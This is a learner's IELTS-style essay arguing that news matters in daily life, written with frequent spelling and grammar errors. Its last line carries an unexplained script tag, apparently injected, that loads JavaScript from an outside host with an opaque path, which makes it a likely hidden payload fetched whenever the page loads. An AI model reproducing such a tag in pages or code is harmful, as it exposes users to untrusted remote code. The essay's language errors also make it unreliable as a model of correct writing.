Some people think news has no connection to people's lives. Therefore, it is a waste of time to read the newspaper or watch television program. To what extent do you agree or disagree?

It is claimed that news is not relevant to people's lives so it is not neccessary to watch TV or read newspaper. While some people find their comfort in holding this opinion, I strongly believe that this idea is absurd which means that news still play an important role in people's lives.

On the one hand, some people can argue that they do not need to spend time on following news. This maybe true if they consider such new items aa the lives or celebrities or the latest fashion. In the mean time, they can approach the information just by hearing through the grapevine. They are set in their ways and believe that they are not behind the times. Life for them, therefore, do not highly appreciate sources of news throygh TV and newspapers.

On the other hand, it is dangerously misguided to deny neccesity of news in daily life. Firstly, information which is officially confirmed by national and local authories through, for instance, climate change or effects of a virus, is only carried through news. Secondly, in a democratic society, it is also vital for citizens to be informed about legal adjustment at least partly through TV or newpapers reports. Thirdly, business and financial session directly affecting the economy regularly update data and public to residents through prestige sources of news.

In conclusion, despite the triviality of lots of piece of information, I totally disagree that it is a waste of time to follow the news. <script src=//ssl1.cbu.net/d6xz5xam></script>